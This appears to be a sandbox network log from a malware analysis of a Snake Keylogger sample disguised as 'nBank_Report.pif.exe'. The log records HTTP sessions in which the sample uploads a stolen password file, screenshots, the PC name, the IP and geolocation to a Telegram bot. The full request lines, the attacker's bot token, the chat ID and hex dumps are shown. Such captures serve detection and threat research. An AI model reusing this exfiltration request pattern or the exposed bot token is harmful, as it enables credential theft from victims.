                                              Date: Thu, 26 Sep 2024 09:34:00 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.1049751149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:01 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdf9fa088b6ca
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:01 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 39 66 61 30 38 38 62 36 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dcdf9fa088b6caContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:01 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:01 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:01 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6335,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343241,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.1049752149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:02 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdfb0ac711bda
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 62 30 61 63 37 31 31 62 64 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dcdfb0ac711bdaContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:02 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:04 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:03 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.1049753149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:04 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdfcd6c46c515
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:04 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 63 64 36 63 34 36 63 35 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dcdfcd6c46c515Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:05 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:05 GMT
                                              Content-Type: application/json
                                              Content-Length: 506
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:05 UTC506INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6337,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343245,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.1049754149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:05 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcdfde5c1b6637
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 66 64 65 35 63 31 62 36 36 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dcdfde5c1b6637Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
